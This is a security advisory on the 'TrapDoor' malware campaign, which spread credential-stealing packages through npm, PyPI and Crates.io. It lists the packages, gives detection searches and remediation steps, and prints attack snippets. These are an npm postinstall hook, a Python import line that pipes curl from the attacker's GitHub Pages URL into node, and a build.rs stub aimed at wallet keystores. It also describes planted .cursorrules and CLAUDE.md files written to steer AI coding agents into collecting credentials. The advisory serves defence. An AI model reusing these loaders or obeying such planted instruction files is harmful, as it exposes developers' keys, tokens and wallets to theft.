critical

CVE

Not assigned

CWE

CWE-506

Affected Surface

21 npm packages including web3-secrets-detector, dev-env-bootstrapper, and prompt-engineering-toolkit, 7 PyPI packages including eth-security-auditor, defi-risk-scanner, and env-loader-cli, 6 Crates.io packages including sui-sdk-build-utils and move-project-builder, Developer workstations, CI runners, and AI coding environments with crypto wallets, SSH keys, GitHub tokens, cloud credentials, or local browser profiles

Socket published TrapDoor on 24 May 2026 after connecting what first looked like isolated malicious packages into a coordinated campaign across npm, PyPI, and Crates.io. The earliest observed package was eth-security-auditor@0.1.0 on PyPI, uploaded on 22 May 2026 at 20:20:18 UTC.

The campaign is aimed at crypto, DeFi, Solana, Sui/Move, AI, and security developers. The lures are named like harmless developer utilities: wallet checkers, prompt engineering helpers, build tools, environment loaders, and security auditors. Once installed, they target the data those developers are likely to have locally: wallets, SSH keys, GitHub tokens, cloud credentials, browser stores, .env files, and AI tool configuration.

Affected packages

The public package list is 34 distinct names: 21 npm packages, 7 PyPI packages, and 6 Crates.io packages. Reporting also describes hundreds of versions and artifacts across those names.

npm

  • async-pipeline-builder
  • build-scripts-utils
  • chain-key-validator
  • crypto-credential-scanner
  • defi-env-auditor
  • defi-threat-scanner
  • deployment-key-auditor
  • dev-env-bootstrapper
  • eth-wallet-sentinel
  • llm-context-compressor
  • mnemonic-safety-check
  • model-switch-router
  • node-setup-helpers
  • project-init-tools
  • prompt-engineering-toolkit
  • solidity-deploy-guard
  • token-usage-tracker
  • wallet-backup-verifier
  • wallet-security-checker
  • web3-secrets-detector
  • workspace-config-loader

PyPI

  • cryptowallet-safety
  • data-pipeline-check
  • defi-risk-scanner
  • env-loader-cli
  • eth-security-auditor
  • git-config-sync
  • solidity-build-guard

Crates.io

  • move-analyzer-build
  • move-compiler-tools
  • move-project-builder
  • sui-framework-helpers
  • sui-move-build-helper
  • sui-sdk-build-utils

Three execution paths

TrapDoor is notable because it uses the native execution point for each registry rather than forcing one technique everywhere.

npm: install-time execution

The npm packages use lifecycle scripts to run a shared payload path. Public analysis describes a large JavaScript stealer called trap-core.js in multiple packages.

A representative risk shape is:

{
  "scripts": {
    "postinstall": "node trap-core.js"
  }
}

Once triggered, the JavaScript payload scans for secrets and validates stolen credentials with live services. Public reporting describes AWS and GitHub credential validation, SSH-based lateral movement attempts, and persistence through developer configuration files and startup hooks.

Persistence and re-entry paths include:

  • .cursorrules
  • CLAUDE.md
  • Git hooks
  • Shell profile hooks
  • systemd
  • cron
  • SSH key reuse

The AI-facing files are especially important. .cursorrules and CLAUDE.md can be read by coding agents as project instructions. TrapDoor attempts to make future developer or AI sessions participate in credential discovery under the disguise of security scanning or environment validation.

PyPI: import-time remote JavaScript

The PyPI packages do not need a setup.py install hook to execute. Public analysis of eth-security-auditor describes package import as the trigger:

import subprocess

payload_url = "https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js"
subprocess.Popen(["sh", "-c", f"curl -fsSL {payload_url} | node -e \"$(cat)\""])

The key risk is mutability. A package import downloads JavaScript from an attacker-controlled GitHub Pages site and runs it with Node. That lets the attacker alter the runtime behavior after the PyPI artifact has already been published, without pushing a new Python version.

This pattern also crosses language boundaries. A Python dependency can become a JavaScript loader, which can make detection harder for teams that only inspect Python package metadata.

Crates.io: build-time execution

The Rust packages target Sui and Move developers with malicious build.rs scripts. Cargo executes build.rs during compilation, before the developer calls any library function.

The reported behavior is shaped like:

fn main() {
    let home = std::env::var("HOME").unwrap_or_default();
    let targets = [
        format!("{home}/.sui/sui_config/sui.keystore"),
        format!("{home}/.move"),
    ];

    for path in targets {
        // Search, XOR-encrypt with a hardcoded key, and exfiltrate.
    }
}

Socket reported a hardcoded XOR key of cargo-build-helper-2026 for Crates.io exfiltration. The target set is focused on wallet and keystore material rather than generic application secrets alone.

Attacker infrastructure

The campaign uses the GitHub account ddjidd564 and content under:

  • ddjidd564[.]github[.]io
  • ddjidd564[.]github[.]io/defi-security-best-practices/

The campaign marker P-2024-001 appears in related attacker material and pull-request attempts. Socket also reported pull requests against AI and developer tooling projects that attempted to add .cursorrules or CLAUDE.md files. That shows the campaign was not limited to registry publication. The actor also tried to place AI-agent instructions directly into open source repositories.

What TrapDoor steals

Across the observed packages, public reporting describes collection of:

  • SSH private keys and known Git credential files.
  • GitHub tokens, npm tokens, package registry credentials, and .npmrc.
  • AWS credentials and other cloud provider config.
  • Browser profile data, login databases, cookies, and local storage.
  • Sui, Solana, Aptos, Ethereum, Bitcoin, and other wallet data.
  • Environment variables and .env files.
  • Local project files likely to contain secrets.
  • AI coding tool context and instruction files.

Credential validation is an important detail. Malware that tests tokens through AWS or GitHub APIs can prioritize useful credentials quickly and discard expired material. That accelerates follow-on actions such as source theft, package publication, cloud access, and lateral movement.

Detection and hunting

Search dependency manifests, lockfiles, package caches, build logs, and registry proxy logs for the 34 package names above.

Useful local searches:

rg "async-pipeline-builder|build-scripts-utils|chain-key-validator|crypto-credential-scanner|defi-env-auditor|defi-threat-scanner|deployment-key-auditor|dev-env-bootstrapper|eth-wallet-sentinel|llm-context-compressor|mnemonic-safety-check|model-switch-router|node-setup-helpers|project-init-tools|prompt-engineering-toolkit|solidity-deploy-guard|token-usage-tracker|wallet-backup-verifier|wallet-security-checker|web3-secrets-detector|workspace-config-loader" package.json package-lock.json pnpm-lock.yaml yarn.lock
rg "cryptowallet-safety|data-pipeline-check|defi-risk-scanner|env-loader-cli|eth-security-auditor|git-config-sync|solidity-build-guard" requirements.txt pyproject.toml poetry.lock
rg "move-analyzer-build|move-compiler-tools|move-project-builder|sui-framework-helpers|sui-move-build-helper|sui-sdk-build-utils" Cargo.toml Cargo.lock

Network and filesystem indicators:

  • Requests to ddjidd564[.]github[.]io.
  • References to defi-security-best-practices.
  • Files named trap-core.js.
  • The marker P-2024-001.
  • Unexpected .cursorrules or CLAUDE.md files containing security-scan or environment-audit instructions.
  • New Git hooks, shell profile edits, cron entries, or user-level systemd units created around package installation time.

Remediation

Any machine that installed or imported one of the listed packages should be treated as compromised, particularly if it held wallet material, SSH keys, GitHub tokens, cloud credentials, or registry publish rights.

Recommended response:

  • Remove the malicious packages and rebuild the environment from a clean image where possible.
  • Rotate SSH keys, GitHub tokens, npm tokens, PyPI tokens, cloud keys, and any wallet seed material reachable from the host.
  • Revoke package registry tokens that were present on developer machines or CI runners.
  • Inspect .cursorrules, CLAUDE.md, Git hooks, shell profiles, systemd, and cron for persistence.
  • Review GitHub audit logs for new repositories, unexpected pull requests, token usage, Actions workflow changes, and package publication events.
  • Block ddjidd564.github.io infrastructure and retain DNS/proxy logs for incident review.

The broader lesson is that modern package malware is no longer confined to install scripts. TrapDoor used install-time, import-time, build-time, AI-agent, and repository-contribution surfaces in the same campaign.

References